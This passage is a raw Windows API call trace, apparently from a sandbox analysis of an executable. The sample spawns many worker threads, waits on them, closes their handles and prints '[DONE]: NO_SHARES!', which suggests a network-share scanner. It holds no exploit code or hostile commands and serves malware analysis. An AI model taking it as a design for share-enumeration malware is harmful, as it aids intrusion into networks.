(hThread=0x508) returned 0x1 [0088.771] Sleep (dwMilliseconds=0xa) [0088.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eaf1c4 | out: lpThreadId=0x1eaf1c4*=0xca0) returned 0x528 [0088.791] SetThreadPriority (hThread=0x528, nPriority=0) returned 1 [0088.791] ResumeThread (hThread=0x528) returned 0x1 [0088.791] Sleep (dwMilliseconds=0xa) [0088.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e10, dwCreationFlags=0x4, lpThreadId=0x1eaf224 | out: lpThreadId=0x1eaf224*=0xca8) returned 0x52c [0088.803] SetThreadPriority (hThread=0x52c, nPriority=0) returned 1 [0088.803] ResumeThread (hThread=0x52c) returned 0x1 [0088.803] Sleep (dwMilliseconds=0xa) [0088.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e00, dwCreationFlags=0x4, lpThreadId=0x1eaf284 | out: lpThreadId=0x1eaf284*=0xcac) returned 0x530 [0088.813] SetThreadPriority (hThread=0x530, nPriority=0) returned 1 [0088.813] ResumeThread (hThread=0x530) returned 0x1 [0088.814] Sleep (dwMilliseconds=0xa) [0088.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e40, dwCreationFlags=0x4, lpThreadId=0x1eaf2e4 | out: lpThreadId=0x1eaf2e4*=0xcb0) returned 0x534 [0088.825] SetThreadPriority (hThread=0x534, nPriority=0) returned 1 [0088.825] ResumeThread (hThread=0x534) returned 0x1 [0088.825] Sleep (dwMilliseconds=0xa) [0088.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e50, dwCreationFlags=0x4, lpThreadId=0x1eaf344 | out: lpThreadId=0x1eaf344*=0xcb4) returned 0x538 [0088.844] SetThreadPriority (hThread=0x538, nPriority=0) returned 1 [0088.844] ResumeThread (hThread=0x538) returned 0x1 [0088.845] Sleep (dwMilliseconds=0xa) [0088.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e80, dwCreationFlags=0x4, lpThreadId=0x1eaf3a4 | out: lpThreadId=0x1eaf3a4*=0xcb8) returned 0x53c [0088.857] SetThreadPriority (hThread=0x53c, nPriority=0) returned 1 [0088.857] ResumeThread (hThread=0x53c) returned 0x1 [0088.857] Sleep (dwMilliseconds=0xa) [0088.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e90, dwCreationFlags=0x4, lpThreadId=0x1eaf404 | out: lpThreadId=0x1eaf404*=0xcbc) returned 0x540 [0088.872] SetThreadPriority (hThread=0x540, nPriority=0) returned 1 [0088.872] ResumeThread (hThread=0x540) returned 0x1 [0088.872] Sleep (dwMilliseconds=0xa) [0088.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eaf464 | out: lpThreadId=0x1eaf464*=0xcc0) returned 0x574 [0088.894] SetThreadPriority (hThread=0x574, nPriority=0) returned 1 [0088.894] ResumeThread (hThread=0x574) returned 0x1 [0088.894] Sleep (dwMilliseconds=0xa) [0088.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eaf4c4 | out: lpThreadId=0x1eaf4c4*=0xcc4) returned 0x578 [0088.920] SetThreadPriority (hThread=0x578, nPriority=0) returned 1 [0088.920] ResumeThread (hThread=0x578) returned 0x1 [0088.920] Sleep (dwMilliseconds=0xa) [0088.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eaf524 | out: lpThreadId=0x1eaf524*=0xcc8) returned 0x57c [0088.935] SetThreadPriority (hThread=0x57c, nPriority=0) returned 1 [0088.935] ResumeThread (hThread=0x57c) returned 0x1 [0088.935] Sleep (dwMilliseconds=0xa) [0088.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eaf584 | out: lpThreadId=0x1eaf584*=0xccc) returned 0x580 [0088.950] SetThreadPriority (hThread=0x580, nPriority=0) returned 1 [0088.950] ResumeThread (hThread=0x580) returned 0x1 [0088.950] Sleep (dwMilliseconds=0xa) [0088.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eaf5e4 | out: lpThreadId=0x1eaf5e4*=0xcd4) returned 0x5e4 [0088.996] SetThreadPriority (hThread=0x5e4, nPriority=0) returned 1 [0088.996] ResumeThread (hThread=0x5e4) returned 0x1 [0088.996] Sleep (dwMilliseconds=0xa) [0089.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eaf644 | out: lpThreadId=0x1eaf644*=0xcd8) returned 0x5e8 [0089.013] SetThreadPriority (hThread=0x5e8, nPriority=0) returned 1 [0089.013] ResumeThread (hThread=0x5e8) returned 0x1 [0089.013] Sleep (dwMilliseconds=0xa) [0089.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e90, dwCreationFlags=0x4, lpThreadId=0x1eaf6a4 | out: lpThreadId=0x1eaf6a4*=0xcdc) returned 0x5ec [0089.031] SetThreadPriority (hThread=0x5ec, nPriority=0) returned 1 [0089.031] ResumeThread (hThread=0x5ec) returned 0x1 [0089.031] Sleep (dwMilliseconds=0xa) [0089.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e80, dwCreationFlags=0x4, lpThreadId=0x1eaf704 | out: lpThreadId=0x1eaf704*=0xce0) returned 0x5f0 [0089.044] SetThreadPriority (hThread=0x5f0, nPriority=0) returned 1 [0089.044] ResumeThread (hThread=0x5f0) returned 0x1 [0089.044] Sleep (dwMilliseconds=0xa) [0089.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e50, dwCreationFlags=0x4, lpThreadId=0x1eaf764 | out: lpThreadId=0x1eaf764*=0xce4) returned 0x5f4 [0089.062] SetThreadPriority (hThread=0x5f4, nPriority=0) returned 1 [0089.062] ResumeThread (hThread=0x5f4) returned 0x1 [0089.062] Sleep (dwMilliseconds=0xa) [0089.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eaf7c4 | out: lpThreadId=0x1eaf7c4*=0xcf0) returned 0x628 [0089.087] SetThreadPriority (hThread=0x628, nPriority=0) returned 1 [0089.087] ResumeThread (hThread=0x628) returned 0x1 [0089.087] Sleep (dwMilliseconds=0xa) [0089.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90df0, dwCreationFlags=0x4, lpThreadId=0x1eaf824 | out: lpThreadId=0x1eaf824*=0xcf4) returned 0x62c [0089.109] SetThreadPriority (hThread=0x62c, nPriority=0) returned 1 [0089.109] ResumeThread (hThread=0x62c) returned 0x1 [0089.109] Sleep (dwMilliseconds=0xa) [0089.122] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e70, dwCreationFlags=0x4, lpThreadId=0x1eaf884 | out: lpThreadId=0x1eaf884*=0xcf8) returned 0x630 [0089.122] SetThreadPriority (hThread=0x630, nPriority=0) returned 1 [0089.122] ResumeThread (hThread=0x630) returned 0x1 [0089.122] Sleep (dwMilliseconds=0xa) [0089.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e20, dwCreationFlags=0x4, lpThreadId=0x1eaf8e4 | out: lpThreadId=0x1eaf8e4*=0xcfc) returned 0x634 [0089.139] SetThreadPriority (hThread=0x634, nPriority=0) returned 1 [0089.139] ResumeThread (hThread=0x634) returned 0x1 [0089.139] Sleep (dwMilliseconds=0xa) [0089.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e60, dwCreationFlags=0x4, lpThreadId=0x1eaf944 | out: lpThreadId=0x1eaf944*=0xd08) returned 0x674 [0089.173] SetThreadPriority (hThread=0x674, nPriority=0) returned 1 [0089.173] ResumeThread (hThread=0x674) returned 0x1 [0089.173] Sleep (dwMilliseconds=0xa) [0089.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1e90e30, dwCreationFlags=0x4, lpThreadId=0x1eaf9a4 | out: lpThreadId=0x1eaf9a4*=0xd0c) returned 0x678 [0089.187] SetThreadPriority (hThread=0x678, nPriority=0) returned 1 [0089.187] ResumeThread (hThread=0x678) returned 0x1 [0089.187] Sleep (dwMilliseconds=0xa) [0089.850] WaitForMultipleObjects (nCount=0x40, lpHandles=0x19fa08*=0x2c0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] CloseHandle (hObject=0x2c0) returned 1 [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] CloseHandle (hObject=0x2c4) returned 1 [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] CloseHandle (hObject=0x2c8) returned 1 [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] CloseHandle (hObject=0x2cc) returned 1 [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] GetCurrentThreadId () returned 0x3ac [0258.857] CloseHandle (hObject=0x2d0) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x2d4) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x2d8) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x300) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x304) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x308) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x330) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x334) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x338) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x33c) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x340) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x368) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x36c) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] GetCurrentThreadId () returned 0x3ac [0258.858] CloseHandle (hObject=0x370) returned 1 [0258.858] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x374) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x3c0) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x3c4) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x3c8) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x3cc) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x404) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x408) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x40c) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x410) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] CloseHandle (hObject=0x444) returned 1 [0258.859] GetCurrentThreadId () returned 0x3ac [0258.859] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x448) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x44c) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x480) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x484) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x488) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x48c) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x4b4) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] CloseHandle (hObject=0x4b8) returned 1 [0258.860] GetCurrentThreadId () returned 0x3ac [0258.860] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x4bc) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x4f0) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x4f4) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x4f8) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x4fc) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x508) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x528) returned 1 [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] GetCurrentThreadId () returned 0x3ac [0258.861] CloseHandle (hObject=0x52c) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x530) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x534) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x538) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x53c) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x540) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x574) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x578) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x57c) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x580) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x5e4) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x5e8) returned 1 [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] GetCurrentThreadId () returned 0x3ac [0258.864] CloseHandle (hObject=0x5ec) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x5f0) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x5f4) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x628) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x62c) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x630) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x634) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x674) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] CloseHandle (hObject=0x678) returned 1 [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] GetCurrentThreadId () returned 0x3ac [0258.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0258.865] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0258.865] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0258.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0258.865] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0258.865] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0258.865] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x2, lpOverlapped=0x0) returned 1 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: NO_SHARES!", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[DONE]: NO_SHARES!", cchWideChar=18, lpMultiByteStr=0x1e98794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[DONE]: NO_SHARES!", lpUsedDefaultChar=0x0) returned 18 [0258.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0258.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0258.870] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0258.870] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0x14, lpOverlapped=0x0) returned 1 [0258.875] WSACleanup () returned 0 [0260.842] FreeLibrary (hLibModule=0x76ed0000) returned 1 [0260.842] GetCurrentThreadId () returned 0x3ac [0260.842] GetCurrentThreadId () returned 0x3ac [0260.842] GetCurrentProcess () returned 0xffffffff [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x401000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xe1000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4e2000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4e2000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4e5000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4e5000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4e7000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4e7000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4eb000, lpBuffer=0x19fb88, dwLength=0x1c | out: lpBuffer=0x19fb88*(BaseAddress=0x4eb000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x8, Type=0x1000000)) returned 0x1c [0260.843] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x4ec000, 